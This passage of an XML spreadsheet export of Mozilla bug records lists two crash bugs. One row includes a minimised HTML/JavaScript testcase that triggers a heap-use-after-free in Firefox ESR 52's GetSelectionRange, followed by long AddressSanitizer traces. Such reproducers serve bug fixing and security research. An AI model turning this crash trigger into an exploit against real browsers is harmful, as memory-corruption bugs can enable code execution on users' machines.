    #43 0x7fd6fc6cbe02 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2771:12
    #44 0x7fd6f39a95b7 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1211:23
    #45 0x7fd6f2154326 in PrepareAndDispatch /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:122:14
    #46 0x7fd6f21532f6 in SharedStub (/home/nils/MonkeyFarm/firefox/libxul.so+0x1f872f6)
    #47 0x7fd6fa581ef8 in nsBrowserStatusFilter::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/toolkit/components/statusfilter/nsBrowserStatusFilter.cpp:172:16
    #48 0x7fd6f3e09500 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/base/PresShell.cpp:4171:27 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush)
Shadow bytes around the buggy address:
  0x0c2e8002d260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8002d270: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8002d280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e8002d290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8002d2a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c2e8002d2b0: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8002d2c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8002d2d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8002d2e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c2e8002d2f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e8002d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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4239==ABORTING</t>
        </is>
      </c>
      <c r="X5946" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5947">
      <c r="A5947" t="n">
        <v>413085</v>
      </c>
      <c r="B5947" t="inlineStr">
        <is>
          <t>2008-01-18 21:07:27 -0800</t>
        </is>
      </c>
      <c r="C5947" t="inlineStr">
        <is>
          <t>"ASSERTION: SetMayHaveFrame failed" and crash [@ nsCSSFrameConstructor::CreateFloatingLetterFrame] with Arabic, floating first-letter</t>
        </is>
      </c>
      <c r="D5947" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E5947" t="n">
        <v>1</v>
      </c>
      <c r="F5947" t="n">
        <v>1</v>
      </c>
      <c r="G5947" t="n">
        <v>3</v>
      </c>
      <c r="H5947" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5947" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5947" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K5947" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5947" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5947" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5947" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5947" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5947" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5947" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5947" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5947" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5947" t="n">
        <v>1</v>
      </c>
      <c r="U5947" t="n">
        <v>0</v>
      </c>
      <c r="V5947" t="n">
        <v>34</v>
      </c>
      <c r="W5947" t="inlineStr">
        <is>
          <t>Loading the testcase triggers:
###!!! ASSERTION: SetMayHaveFrame failed?: 'mContent-&gt;MayHaveFrame()', file /Users/jruderman/trunk/mozilla/layout/generic/nsFrame.cpp, line 409
followed by a null deref [@ nsCSSFrameConstructor::CreateFloatingLetterFrame].</t>
        </is>
      </c>
      <c r="X5947" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5948">
      <c r="A5948" t="n">
        <v>1418922</v>
      </c>
      <c r="B5948" t="inlineStr">
        <is>
          <t>2017-11-20 00:38:47 -0800</t>
        </is>
      </c>
      <c r="C5948" t="inlineStr">
        <is>
          <t>heap-use-after-free in GetSelectionRange</t>
        </is>
      </c>
      <c r="D5948" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:39 -0700</t>
        </is>
      </c>
      <c r="E5948" t="n">
        <v>1</v>
      </c>
      <c r="F5948" t="n">
        <v>1</v>
      </c>
      <c r="G5948" t="n">
        <v>3</v>
      </c>
      <c r="H5948" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5948" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5948" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5948" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L5948" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5948" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5948" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5948" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5948" t="inlineStr">
        <is>
          <t>[adv-esr52.6+][fixed on trunk in bug 1343037]</t>
        </is>
      </c>
      <c r="Q5948" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5948" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5948" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5948" t="n">
        <v>1</v>
      </c>
      <c r="U5948" t="n">
        <v>0</v>
      </c>
      <c r="V5948" t="n">
        <v>10</v>
      </c>
      <c r="W5948" t="inlineStr">
        <is>
          <t>Created attachment 8930010
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox ESR 52.5.0 (SourceStamp=f9df5238dca13e40b8128faba317df25e2f69249). It requires the fuzzPriv extension.
&lt;script&gt;
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try {x.send("X");} catch(e){}
}
function start() {
	o33=document.createElementNS('http://www.w3.org/1999/xhtml','marquee');
	document.documentElement.addEventListener('DOMAttrModified',fun0);
	o36=document.createElementNS('http://www.w3.org/1999/xhtml','input');
	window.top.document.documentElement.appendChild(o33);
	window.top.setTimeout(fun1, 4);
}
function fun0() {
	window.top.document.documentElement.appendChild(o36);
	o36.focus();
}
function fun1() {
	o90=document.createElementNS('http://www.w3.org/1999/xhtml','marquee');
	document.documentElement.addEventListener('DOMAttrModified',fun2);
	document.documentElement.appendChild(o90);
	fuzzPriv.trustedKeyEvent(document.documentElement,'press',false,false,false,false,33,0);
}
function fun2() {
	o36.parentNode.removeChild(o36);
	spin();
	o36=null;
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();;
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==1018==ERROR: AddressSanitizer: heap-use-after-free on address 0x6150007751b0 at pc 0x7f8e74682779 bp 0x7ffec6f028c0 sp 0x7ffec6f028b8
READ of size 4 at 0x6150007751b0 thread T0
    #0 0x7f8e74682778 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12
    #1 0x7f8e74682778 in IsInUncomposedDoc /home/worker/workspace/build/src/dom/base/nsINode.h:526
    #2 0x7f8e74682778 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:916
    #3 0x7f8e74682778 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:964
    #4 0x7f8e74682778 in nsGenericHTMLElement::GetFormControlFrame(bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:1005
    #5 0x7f8e7453e29a in GetSelectionRange /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:6445:43
    #6 0x7f8e7453e29a in mozilla::dom::HTMLInputElement::GetSelectionStart(int*) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:6283
    #7 0x7f8e77d67089 in GetSelectionStart /home/worker/workspace/build/src/toolkit/components/satchel/nsFormFillController.cpp:560:5
    #8 0x7f8e77d67089 in non-virtual thunk to nsFormFillController::GetSelectionStart(int*) /home/worker/workspace/build/src/toolkit/components/satchel/nsFormFillController.cpp:557
    #9 0x7f8e77d56663 in nsAutoCompleteController::MaybeCompletePlaceholder() /home/worker/workspace/build/src/toolkit/components/autocomplete/nsAutoCompleteController.cpp:1317:3
    #10 0x7f8e77d469ab in nsAutoCompleteController::StartSearches() /home/worker/workspace/build/src/toolkit/components/autocomplete/nsAutoCompleteController.cpp:1358:3
    #11 0x7f8e77d490a5 in nsAutoCompleteController::HandleKeyNavigation(unsigned int, bool*) /home/worker/workspace/build/src/toolkit/components/autocomplete/nsAutoCompleteController.cpp:565:11
    #12 0x7f8e77d6b4dd in nsFormFillController::KeyPress(nsIDOMEvent*) /home/worker/workspace/build/src/toolkit/components/satchel/nsFormFillController.cpp:1081:5
    #13 0x7f8e77d69dd8 in nsFormFillController::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/toolkit/components/satchel/nsFormFillController.cpp:871:12
    #14 0x7f8e742c36ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #15 0x7f8e742c50d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #16 0x7f8e742afbcd in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:358:7
    #17 0x7f8e742b34c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #18 0x7f8e742b53c7 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:780:12
    #19 0x7f8e724a0991 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1309:5
    #20 0x7f8e742d0590 in mozilla::dom::EventTarget::DispatchEvent(JSContext*, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/events/EventTarget.cpp:73:9
    #21 0x7f8e739b158e in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:988:15
    #22 0x7f8e739ae338 in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1164:13
    #23 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #24 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #25 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #26 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #27 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #28 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #29 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #30 0x7f8e79d3da12 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #31 0x7f8e70ec416f in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #32 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #33 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #34 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #35 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #36 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #37 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #38 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #39 0x7f8e79d3fc7d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #40 0x7f8e73a0c769 in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #41 0x7f8e720bc167 in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
    #42 0x7f8e720bc167 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13029
    #43 0x7f8e720bdf00 in nsGlobalWindow::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13308:32
    #44 0x7f8e7229d972 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:63:3
    #45 0x7f8e6f76a039 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
    #46 0x7f8e6f73e48c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
    #47 0x7f8e6f75a4c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:161:15
    #48 0x7f8e6f759e8f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #49 0x7f8e6f74ccab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #50 0x7f8e6f7cedec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #51 0x7f8e70587d5f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #52 0x7f8e704f98b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #53 0x7f8e704f98b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #54 0x7f8e704f98b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #55 0x7f8e75b9ac6f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #56 0x7f8e77c19071 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #57 0x7f8e77db0387 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #58 0x7f8e77db1afd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #59 0x7f8e77db29bc in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #60 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #61 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #62 0x7f8e8b1b882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #63 0x41ba88 in _start (/fuzzer3/esr/firefox/firefox+0x41ba88)
0x6150007751b0 is located 48 bytes inside of 496-byte region [0x615000775180,0x615000775370)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f8e6f615744 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7f8e6f615336 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
    #3 0x7f8e6f61c40e in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
    #4 0x7f8e6f61b8cc in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
    #5 0x7f8e6f61f946 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
    #6 0x7f8e724bc769 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7f8e71fe648d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1340:3
    #8 0x7f8e6f7752b6 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7f8e70f9c7be in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2058:12
    #10 0x7f8e70f9c7be in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1377
    #11 0x7f8e70f9c7be in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1344
    #12 0x7f8e70fa3e48 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1000:12
    #13 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #15 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #16 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #17 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #18 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #19 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #20 0x7f8e79d3da12 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #21 0x7f8e70ec416f in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #24 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #25 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #26 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #27 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #28 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7f8e79d3fc7d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #30 0x7f8e738cbfcc in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #31 0x7f8e742c3662 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
    #32 0x7f8e742c3662 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1130
    #33 0x7f8e742c50d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #34 0x7f8e742b00f9 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:401:9
    #35 0x7f8e742b34c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #36 0x7f8e742b53c7 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:780:12
previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f8e744f38a9 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f8e744f38a9 in NS_NewHTMLInputElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:129
    #4 0x7f8e7469a756 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:291:41
    #5 0x7f8e7469a756 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:263
    #6 0x7f8e724f5638 in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:177:12
    #7 0x7f8e723afda1 in nsDocument::CreateElementNS(nsAString_internal const&amp;, nsAString_internal const&amp;, mozilla::dom::ElementCreationOptionsOrString const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5481:8
    #8 0x7f8e739044b9 in mozilla::dom::DocumentBinding::createElementNS(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1084:53
    #9 0x7f8e73edf5f9 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #10 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #11 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #12 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #13 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #14 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #15 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #16 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
